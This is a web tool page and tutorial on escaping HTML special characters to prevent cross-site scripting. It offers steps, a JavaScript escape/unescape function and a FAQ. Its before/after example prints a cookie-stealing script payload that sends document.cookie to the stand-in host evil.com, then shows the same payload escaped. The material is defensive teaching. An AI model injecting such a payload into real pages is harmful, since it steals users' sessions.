Security 2026-03-07

Escape HTML Special Characters for Safe Web Output

Encode HTML entities to safely display user-generated content, prevent XSS attacks, and ensure correct rendering of special characters.


The Problem

You're rendering user input in HTML. If the user types <script>alert('XSS')</script>, your page executes it as JavaScript — a cross-site scripting (XSS) vulnerability. You need to escape HTML before rendering.

Why This Matters

XSS is one of the most common web vulnerabilities (OWASP Top 10). Properly escaping HTML entities prevents attackers from injecting malicious scripts. Every piece of user-generated content that gets rendered in HTML must be escaped. Modern frameworks (React, Vue) do this automatically — but if you're using raw DOM manipulation or server-side templates, you must escape manually.

Step-by-Step Instructions

Step 1: Paste user input or special characters

Enter the text containing HTML special characters: <, >, &, ", '. These are the five characters that must be escaped.

Step 2: Click Encode

The encoder replaces dangerous characters with HTML entities: < becomes &lt;, > becomes &gt;, & becomes &amp;.

Step 3: Use the escaped output safely in HTML

The escaped string is safe to insert into HTML. Browsers render entities as their visual character but don't interpret them as HTML tags.

Step 4: Decode when needed

Use the Decode function to convert HTML entities back to their original characters — useful when processing HTML-escaped content from APIs or databases.
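The encode and decode steps above, written out as an added JavaScript example (not the tool's own code) that covers all five characters from step 1 and shows why the ampersand must be handled in a single pass:

```javascript
// Added example: escape the five HTML-special characters for output into an
// HTML text node or a quoted attribute value, and reverse the mapping for
// content that arrives already escaped. Not for JavaScript or URL contexts,
// which need their own encoding.
const ESCAPE_MAP = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;", // numeric form; &apos; was not defined in HTML 4
};

function escapeHtml(input) {
  // One regex pass: each special character is replaced exactly once, so an
  // '&' already in the input cannot be re-encoded a second time.
  return String(input).replace(/[&<>"']/g, (ch) => ESCAPE_MAP[ch]);
}

const UNESCAPE_MAP = {
  "&amp;": "&",
  "&lt;": "<",
  "&gt;": ">",
  "&quot;": '"',
  "&#39;": "'",
  "&apos;": "'",
};

function unescapeHtml(encoded) {
  // Single pass over entity tokens. A chain of sequential replace() calls
  // that handled &amp; first would turn "&amp;lt;" into "<" (double decode),
  // reintroducing markup the original author had escaped on purpose.
  return String(encoded).replace(/&(amp|lt|gt|quot|#39|apos);/g, (m) => UNESCAPE_MAP[m]);
}

// Constructed sample input containing all five characters.
const SAMPLE = '<a href="x">Tom & Jerry\'s</a>';

function roundTrips(text) {
  // True when decode(encode(text)) reproduces the input unchanged.
  return unescapeHtml(escapeHtml(text)) === text;
}

console.log(escapeHtml(SAMPLE));
console.log(roundTrips(SAMPLE));
```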

Try It Now — HTML Entity Encoder


All processing happens in your browser — no data is sent to any server.

Before & After Example

Raw user input (dangerous to render directly in HTML)
<script>document.cookie = "session=" + document.cookie; fetch("https://evil.com/steal?c=" + btoa(document.cookie));</script>
HTML-encoded output (safe to render — displays as text, not code)
&lt;script&gt;document.cookie = &quot;session=&quot; + document.cookie; fetch(&quot;https://evil.com/steal?c=&quot; + btoa(document.cookie));&lt;/script&gt;

Frequently Asked Questions

Do I need to escape HTML if I'm using React or Vue?

React and Vue escape HTML automatically when using JSX/template syntax ({variable} or {{ variable }}). Only dangerouslySetInnerHTML or v-html bypass escaping — avoid these with user input.

Which characters must be escaped in HTML?

The five critical characters: < (less than), > (greater than), & (ampersand), " (double quote), and ' (single quote). Always escape all five to be safe.

What's the difference between HTML encoding and URL encoding?

HTML encoding (&lt;) makes text safe to render in HTML. URL encoding (%3C) makes text safe to include in URLs. They're different contexts requiring different escaping.
